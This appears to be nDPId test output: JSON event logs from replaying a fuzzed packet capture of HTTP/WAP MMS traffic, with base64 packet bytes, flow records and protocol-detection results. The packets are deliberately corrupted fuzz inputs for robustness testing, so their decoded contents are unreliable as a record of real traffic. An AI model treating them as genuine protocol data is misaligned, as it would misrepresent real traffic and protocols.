00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854535021,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMVAAEAGF8ysFAMNrBQDBQBQCi3KbXHL5PFb4GASgywvJwAAAgQFtA=="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAAoJUtAAIAGd0qsFAMFrBQDDQotAFDk8Vvgym1xzFAQIjin2AAAAgQFtGDD"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":72,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":1480,"global_ts_msec":1031854535021}
02307{"packet_event_id":1,"packet_event_name":"packet","packet_id":72,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1514,"pkt_l4_len":0,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFACVzAEtAAIAGcJasFAMFrBQDDQotAFDk8Vvgym1xzFAQIjhHEAAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N0OiAxNzIuMjAuMy4xMw0KT3B0OiAiaHR0cDovL3d3dy53My5vcmcvMTk5OS8wNi8yNC1DQ1BQZXhjaGFuZ2UiOyBucz01Ng0KQ29udGVudC1UeXB0OiBhcHBsaWNhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpBY2NlcHQ6IGFwcGxpY2F0Rm9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpBY2NlcHQtTGFuZ3VhZ2U6IENuDQpVc2VyLUFnZW50OiBTb255inJpY3Nzb25UNjgvUjIwMUENCkFjY2Vw9C1DaGFyc2V0OiAqDQo1Ni1Qcm9maWxlLURpZmYtMTogPD94bWwgdqdyc2lvbj0iMS4wIj8+PHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjInhtbG5zOnByZj0ibHR0cDovL3d3dy53YXBmb3J1bS5vcmcvVUFQUk9GL2Nja3BzY2hlbWEtMTk5OTEwMTQjIj48IS0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IERlZmF1bHQgZGVzY3JpcHRpb24gb2YgcHJvcGVydGllcyAtLT48cmRmOkRlc2NyaXB0aW9uPjxwcmY6Q2NwcEFjY2VwdD48cmRmOkJhJXMAcmRmOmxpPmFwcGxpY2F0aW9uL3ZubC53YXAubW1zLW1lc3NhZ2U8L3JkZjpsaT48L3JkZjpCYWc+PC9wcmY6Q2NwcEFjY2VwdD48L3JkZjpEZXNjcmlwdGlvbj48L3JkZjpSREY+DQo1Ni1Qcm9maWxlLURpZmYt1TogPD94bWwgdmVyc2lvbj0iMS4wIj8+PHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjInhtbG5zOnByZj0iaHR0cDovL3d3dy53YXBmb3J1bS5vUmcvVUFQUk9GL2NjcHBzY2hlbWEtMTk5OTEwMTQjIiVzAC0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IEQlcwB1bHQgZGVzY3JpcHRpb24gb2YgcHJvcGVydGllcyAtJj48cqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01031{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":477,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":477,"pkt_l4_len":443,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAHPJ0tAAIAGc6MzFAMFrBQDDQotAFDk8WGUym1xzFAYIjj+OwAAMjAxLnhtbCIsIjEtT3dQVndnTWs4aXRxR3gwOGZNWXVTdz09IiwiMi1IZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzCXlLQnBCem01c2xPb2RISEE9PYeXCkNvb2tpZTogVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT02QzZENjM2RDZGNkM2Ng0KQ29va2llOiBVc2VyLUlkZW50aXR5LUZvcndhcmQtbXNpc2RuPTM0MzkzMTM3MzIzNjMxMzAzMTMwMzAzNA0KQ29vayVzACBVc2VyLUlkZW50aXR5LUF1dGhlbnRpY2F0aW9uPUJlYXJncg0KQ29va2llOiBJcC1BZGRybXNzPTE5Mi4xNjguMi4mNg0KQ29va2llOiBCZWFyZXItVHlwZT1VRFANCldBUC1Db25uZWN0aW9uOiBTdGFjay1UeXBlPUNPDQpDb29raWU6IHd0bHMtc2VjdXJpdHktbGV2ZWw9bm9uZQ0KQ29udGVudC1MZW5ndGg6IDE0DQoNCoyDmDE4OTAwMQCNkJGA"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854535022,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1031854535022,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854535022,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMZAAEAGF8+sFAMNrBRMBQBQ\/i3KbXHM5PFhlFAQgyxBMAAA"}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854535090,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1031854535090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":163,"thread_ts_msec":1031854535090,"pkt":"AFCLk5N8CAAgsl17CABFAAC3xMdAAEAGFz+sFAMNLBQDBQBQCi3KbXHM5PFjO1AYgyyWzgAASFRUUC8xLjEgMjIwIE9LDQpTZXJ2ZXI6IEJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3Zuay53YXAubW1zLW1lc3NhZ2UNCkNvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE4OjFKOjM1IEdNVA0KDQo="}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01031{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":477,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":477,"pkt_l4_len":443,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAHPJ0tAAIAGc6MzFAMFrBQDDQotAFDk8WGUym1xzFAYIjj+OwAAMjAxLnhtbCIsIjEtT3dQVndnTWs4aXRxR3gwOGZNWXVTdz09IiwiMi1IZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzCXlLQnBCem01c2xPb2RISEE9PYeXCkNvb2tpZTogVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT02QzZENjM2RDZGNkM2Ng0KQ29va2llOiBVc2VyLUlkZW50aXR5LUZvcndhcmQtbXNpc2RuPTM0MzkzMTM3MzIzNjMxMzAzMTMwMzAzNA0KQ29vayVzACBVc2VyLUlkZW50aXR5LUF1dGhlbnRpY2F0aW9uPUJlYXJncg0KQ29va2llOiBJcC1BZGRybXNzPTE5Mi4xNjguMi4mNg0KQ29va2llOiBCZWFyZXItVHlwZT1VRFANCldBUC1Db25uZWN0aW9uOiBTdGFjay1UeXBlPUNPDQpDb29raWU6IHd0bHMtc2VjdXJpdHktbGV2ZWw9bm9uZQ0KQ29udGVudC1MZW5ndGg6IDE0DQoNCoyDmDE4OTAwMQCNkJGA"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854535022,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1031854535022,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854535022,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMZAAEAGF8+sFAMNrBRMBQBQ\/i3KbXHM5PFhlFAQgyxBMAAA"}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854535090,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1031854535090,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":163,"thread_ts_msec":1031854535090,"pkt":"AFCLk5N8CAAgsl17CABFAAC3xMdAAEAGFz+sFAMNLBQDBQBQCi3KbXHM5PFjO1AYgyyWzgAASFRUUC8xLjEgMjIwIE9LDQpTZXJ2ZXI6IEJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3Zuay53YXAubW1zLW1lc3NhZ2UNCkNvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE4OjFKOjM1IEdNVA0KDQo="}
00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":76,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1031854535294}
00363{"packet_event_id":1,"packet_event_name":"packet","packet_id":76,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854535090,"pkt":"CAAgsl17AFCLk5N8CAAQAAAoKUtAAIAGc0qsFAMFrBQDDQotAFDk8WM7ym1yW1AQIamgfQAAYXRpb24v"}
00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":79,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":20,"global_ts_msec":1031854543322}
00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":79,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1031854543315,"pkt":"AFCLk5N8CAAgsl17CABFAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854543322,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1031854543322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854543322,"pkt":"CAAgsiVzAFCLk5N8CABFAAAoLktAAIAGbkqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854546078,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1031854546078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854546078,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMpAAEAGF8usFAMNrBQDBQBQCk\/KbXJb5PFjPFAQgyw++QAA"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546079,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854546079,"l3_proto":"ip4","src_ip":"172.52.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854546079,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMtAAEAGF8qsNAMNrBQDBQBQCC3KbXJb5PFjPFARuSw++AAA"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557802,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854557802,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854557802,"pkt":"CAAgsl17AFCLk5N8CABFAAAsNUtAAIAGZ0asFAMFrBQDDQouAFDlQWz1AAAAAGACIADjNgAAAgQFtAAA"}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854557802,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMxAAEAGF8WsFAMNrBQDBQBQCi7KxfhE5UFs9mASgyyW7gAAAgQFtA=="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854557802,"pkt":"CAAgsl17AFCLk5N8CABFAAAoNktAAIAGZkqsFAMFrBQDDQouAFDlQWz2ysX4RVAQIjgPoAAAAgQFtAAA"}
00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854557802,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854557802,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}}
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854543322,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1031854543322,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854543322,"pkt":"CAAgsiVzAFCLk5N8CABFAAAoLktAAIAGbkqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854546078,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1031854546078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854546078,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMpAAEAGF8usFAMNrBQDBQBQCk\/KbXJb5PFjPFAQgyw++QAA"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546079,"flow_last_seen":1031854546079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854546079,"l3_proto":"ip4","src_ip":"172.52.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1031854546079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854546079,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMtAAEAGF8qsNAMNrBQDBQBQCC3KbXJb5PFjPFARuSw++AAA"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557802,"flow_last_seen":1031854557802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854557802,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1031854557802,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854557802,"pkt":"CAAgsl17AFCLk5N8CABFAAAsNUtAAIAGZ0asFAMFrBQDDQouAFDlQWz1AAAAAGACIADjNgAAAgQFtAAA"}
